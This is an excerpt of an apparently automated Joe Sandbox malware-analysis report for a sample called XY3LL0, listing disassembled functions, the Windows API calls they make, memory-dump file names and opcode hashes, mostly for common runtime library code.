Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FF8FDF940D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF8FDF941F7
__AdjustPointer.LIBCMT ref: 00007FF8FDF94242

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 45b8669fff560f36b57641c45f5465d5eeb49015c87abaf566b3a8cc62157e25
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 20B1A023E0A64689EB65DB559940E386390FF74BE4F098435DF6E07BC5EE2CE481C386

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FF8FDF9FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF8FDF9FB7C
_set_statfp.LIBCMT ref: 00007FF8FDF9FB97
_set_statfp.LIBCMT ref: 00007FF8FDF9FBB3
_set_statfp.LIBCMT ref: 00007FF8FDF9FBEF

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 303489927459c5bf98b78fffeae21cf6fab512598117ca592aff491d10e3381c
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 4C1186F3E18A0709F7581D14E966B791041EFB83F4F140734E77F063DAAE2CA8844182

Function 00007FF8FDF99684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996A3
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996C2
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996EA
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF996FB
FlsSetValue.KERNEL32(?,?,?,00007FF8FDF9766F,?,?,00000000,00007FF8FDF9790A,?,?,?,?,?,00007FF8FDF97896), ref: 00007FF8FDF9970C

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: c8e9a672bada597bae3e3aec25ccf58c169c048817d696b3438a7fe05bebef7f
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 7D11B122F0C2460DFB5867256D919792141DFA43F0F456335EB3F0B6D6FE2CE4418282

Function 00007FF8FDF99518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF8FDF99529
FlsSetValue.KERNEL32 ref: 00007FF8FDF99548
FlsSetValue.KERNEL32 ref: 00007FF8FDF99570
FlsSetValue.KERNEL32 ref: 00007FF8FDF99581
FlsSetValue.KERNEL32 ref: 00007FF8FDF99592

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 727a99563927bf039ce7c3c34d33622fd68ca01edbd8d1615f3d00a077434c09
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 02111C52E1D2070DFB6967215C5197A1181CFA43F0F591735DB3F0A2E2FD2CB44182C2

Function 00007FF8FDF95448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF8FDF954B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8FDF95503

Strings

MOC, xrefs: 00007FF8FDF954CC
RCC, xrefs: 00007FF8FDF954D4

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 3478a0c9fb8eee00ee1b10c3784700ca90017716ddfbca41dc4f9f44f68736e2
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: B491C073E087858EEB11CB64E8406AC7BA0FB147A8F10413AEB5E07B95EF38D195CB41

Function 00007FF8FDF93A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF93A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8FDF93AFA
RtlUnwindEx.KERNEL32 ref: 00007FF8FDF93B54

Strings

csm, xrefs: 00007FF8FDF93AE1

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: 132006e2a1afc4bfd580cc0b18ca9126a03d159da2f578009155b69a8f341fdc
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: CB517B22F19A428FDB14AF15E844A7873D1EB64BE8F108131DB6F47789EA7DE8418781

Function 00007FF8FDF959C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF959F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8FDF95AD8

Strings

csm, xrefs: 00007FF8FDF95B2A
csm, xrefs: 00007FF8FDF95A12

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: b445ab23580da8f3c1e0f302cd2a490c5d6441b02e980d8e466aa311429d43e5
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 06515DB3D082828EEB658F119884B6876A0EB64BE4F144135DB6E47BD5EF3CE451C782

Function 00007FF8FDF951D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF8FDF95237
_CallSETranslator.LIBVCRUNTIME ref: 00007FF8FDF95283

Strings

MOC, xrefs: 00007FF8FDF9524B
RCC, xrefs: 00007FF8FDF95253

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 1e49a23ec669556ce1a86c24f9678242d05243970217ad2a8a140a36fd749717
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: BF61C333D08BC589D7619B15E840BAAB7A0FB947E4F044225EBAE03B95EF7CD184CB41

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FF8FDF9E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF8FDF9E473
WriteFile.KERNEL32 ref: 00007FF8FDF9E73B
WriteFile.KERNEL32 ref: 00007FF8FDF9E781
GetLastError.KERNEL32 ref: 00007FF8FDF9E837

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 6079f70c6f40a3227641b72e822f47491484e4d5aef02d343ab4a1ea94025ccd
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 24D1A223F196818DE711CB65D8805AC37A1F7647E8B048225DF6F97BD9EE39D406C381

Function 00007FF8FDF9ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FDF9ED07), ref: 00007FF8FDF9EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8FDF9ED07), ref: 00007FF8FDF9EEC3

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 8671d2577c35de10b346d0e99c25dcbc2e68179c16ecb2cb7aa778319ea9aa6b
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 9D91C223F196528DF7509B259880ABC2BA4FB24BE8F14413ADF1F566D4EF39D441C782

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

